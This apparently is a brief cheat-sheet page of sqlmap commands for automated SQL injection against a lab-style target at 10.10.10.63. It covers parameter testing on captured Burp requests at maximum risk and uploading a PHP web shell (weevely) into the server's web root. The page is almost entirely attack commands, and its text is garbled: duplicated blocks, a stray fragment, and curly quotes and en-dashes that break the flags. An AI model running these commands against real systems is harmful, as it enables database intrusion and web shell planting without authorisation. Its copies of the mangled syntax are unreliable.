SQLMap

SQLMap is a tool that can be used to automate scanning and exploiting of SQL Injection.

Below is some examples using SQLMap.

sqlmap -u “http://10.10.10.63/?id=” -a

1 2	sqlmap -u “http://10.10.10.63/?id=” -a

In below examle the scan is based on login.req which is the HTTP captured and exported from Burp Suite.

# -p switch is parameters to test
sqlmap -r login.req –level 5 –risk 3 –string “wrong identification”-p username,password

# -batch switch is to run the test without prompting
sqlmap -r complain.req –batch –level 5 –risk 3 –string “Incorrect datetime value: ‘’ for column ‘close_date’ at row 1” –dbms mysql -p compTitle,compDesc

# Following uploads a PHP script to a writeable location.
sqlmap -r login_web_sqli.req –risk=3 –level=5 -p username –dbms=MySQL –file-write=”/root/phpshells/weeve.php” –file-dest=”/var/www/html”

# -p switch is parameters to test

sqlmap -r login.req –level 5 –risk 3 –string “wrong identification”-p username,password

# -batch switch is to run the test without prompting

sqlmap -r complain.req –batch –level 5 –risk 3 –string “Incorrect datetime value: ‘’ for column ‘close_date’ at row 1” –dbms mysql -p compTitle,compDesc

# Following uploads a PHP script to a writeable location.

sqlmap -r login_web_sqli.req –risk=3 –level=5 -p username –dbms=MySQL –file-write=”/root/phpshells/weeve.php” –file-dest=”/var/www/html”

SQLMap

Tagged on: sqli